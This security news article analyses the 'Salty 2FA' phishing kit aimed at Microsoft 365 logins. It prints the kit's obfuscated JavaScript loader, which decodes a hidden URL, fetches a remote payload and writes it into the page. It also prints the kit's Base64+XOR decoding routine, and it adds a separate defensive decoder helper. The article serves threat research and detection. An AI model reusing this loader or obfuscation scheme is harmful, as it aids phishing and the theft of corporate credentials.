New Salty 2FA PhaaS platform Attacking Microsoft 365 Users to Steal Login Credentials


A sophisticated new Phishing-as-a-Service (PhaaS) framework dubbed “Salty 2FA” has emerged as a significant threat to Microsoft 365 users across US and European industries.

This previously undocumented platform employs advanced obfuscation techniques and multi-stage execution chains specifically designed to bypass two-factor authentication mechanisms while stealing corporate credentials.

The framework targets organizations spanning finance, telecommunications, energy, logistics, and educational sectors through carefully crafted phishing campaigns.


The platform distinguishes itself through a unique domain infrastructure pattern that pairs compound domains in the “.com” zone with domains registered under the Russian “.ru” top-level domain.

Suspicious domain combination (Source – Any.Run)

This distinctive pairing creates a complex web of redirections and payload delivery mechanisms that have helped the platform evade traditional detection systems.

Victims receive phishing emails containing various lures including fake voice messages, document access requests, and billing statements that redirect them to convincing Microsoft login replicas.

ANY.RUN analysts identified this previously unknown PhaaS framework during routine phishing campaign hunting when they discovered multiple sandbox sessions exhibiting similar behavioral patterns despite using different domains and obfuscation techniques.

Analysis of a phishing page (Source – Any.Run)

The consistent use of Cloudflare Turnstile protection combined with the distinctive domain pairing initially flagged these campaigns as potentially related, leading to the comprehensive analysis that revealed Salty 2FA’s full capabilities.

The platform demonstrates concerning sophistication in its ability to intercept and process multiple two-factor authentication methods, including push notifications, SMS codes, voice calls, and authenticator app tokens.

This capability extends the attack beyond simple credential theft, allowing threat actors to maintain persistent access to compromised accounts even when traditional 2FA protections are in place.

Multi-Stage Execution Chain and Obfuscation Techniques

Salty 2FA’s technical architecture relies on a carefully orchestrated five-stage execution process designed to resist analysis and detection.

Obfuscated code (Source – Any.Run)

The initial stage begins with an obfuscated JavaScript function that serves as the entry point, padded with inspirational-quote comments as noise to complicate static analysis.

// Entry point: decodes and renders the next stage, caching it in sessionStorage[0]
async function vitals() {
    // whiz(): Base64-decodes the input, then shifts every character by the code of
    // the first character (the third map() argument is the whole array, so
    // recklessness[0] is that first character and the ternary is always true)
    function whiz(math) {
        return [...atob(math)].map((lewd, matchmaking, recklessness) =>
            recklessness[0] ? String.fromCharCode((lewd.charCodeAt(0) -
            recklessness[0].charCodeAt(0) + 256) % 256) : "").join("");
    }
    // On reload, re-render the cached payload instead of fetching it again
    if (sessionStorage[0]) {
        document.write(whiz(sessionStorage[0]));
        return;
    }
    // The encoded literal hides the payload URL; the fetched body is decoded the same way
    unearned = await (await fetch(await whiz(`1PwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M=`))).text();
    document.write(await whiz(unearned));
    sessionStorage[0] = unearned;
}

The framework encodes element IDs with Base64 combined with an XOR against a fixed, generated key, making dynamic analysis significantly more challenging.

All front-end logic relies on jQuery calls to dynamically generated element identifiers, which must be decoded through a dedicated routine before manipulation.

// Decodes a jQuery element ID: Base64-decode, then XOR with the fixed 32-character key
function decode(s) {
    try {
        var r = "";
        r = atob(s);
        var d = '';
        for (var i = 0; i < r.length; i++) {
            // XOR each byte with the repeating key
            d += String.fromCharCode(r.charCodeAt(i) ^
                'b03e37d4502862adc85953d8ea0c4b6a'.charCodeAt(i %
                'b03e37d4502862adc85953d8ea0c4b6a'.length));
        }
        return d;
    } catch (e) {
        // Not valid Base64: return the selector unchanged
        return s;
    }
}
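The following is an added analyst helper, not code from the Salty 2FA kit or from ANY.RUN: it reproduces the Base64 + XOR element-ID scheme of the decode() routine above so that captured front-end code can be bulk-decoded and checked against known Microsoft login field names. It assumes Node.js (for Buffer) and that the encoded IDs appear directly as jQuery `$('#...')` selector arguments; the encoder and the sample script are constructed here for testing only.

```javascript
// Fixed key observed in the kit's decode() routine
const KEY = 'b03e37d4502862adc85953d8ea0c4b6a';

// XOR each character of `text` with the repeating key (same loop as the kit's decode()).
function xorWithKey(text, key = KEY) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Decode one element ID: Base64 -> binary string -> XOR. Input that is not valid
// Base64 is returned unchanged, mirroring the kit's catch-all fallback.
function decodeId(encoded, key = KEY) {
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(encoded) || encoded.length % 4 !== 0) return encoded;
  return xorWithKey(Buffer.from(encoded, 'base64').toString('latin1'), key);
}

// Inverse of decodeId (constructed for testing; the kit generates its IDs server-side).
function encodeId(plain, key = KEY) {
  return Buffer.from(xorWithKey(plain, key), 'latin1').toString('base64');
}

// Walk a script body, find jQuery ID selectors and map each raw ID to its decoded name.
function decodeSelectors(source, key = KEY) {
  const found = {};
  const re = /\$\(['"]#([A-Za-z0-9+/=]+)['"]\)/g;
  let m;
  while ((m = re.exec(source)) !== null) found[m[1]] = decodeId(m[1], key);
  return found;
}

// Constructed sample mimicking the kit's front-end: two encoded IDs matching the
// Microsoft login form field names, plus one plain selector that must pass through.
const SAMPLE = [
  `$('#${encodeId('loginfmt')}').val();`,
  `$("#${encodeId('passwd')}").on('keyup', handler);`,
  `$('#footer').hide();`,
].join('\n');

console.log(decodeSelectors(SAMPLE));
```

Running the scan over a real captured page reveals which Microsoft form fields the kit hooks, which is the detection signal a SOC analyst would want to pivot on.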

The platform incorporates multiple anti-analysis mechanisms including keyboard shortcut blocking for debugging tools and execution time measurement to detect controlled environments.

Data exfiltration utilizes the same XOR technique with session-derived keys, while stolen credentials are transmitted to Russian-hosted servers through encoded POST requests containing both the encrypted data and decoding parameters.



About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.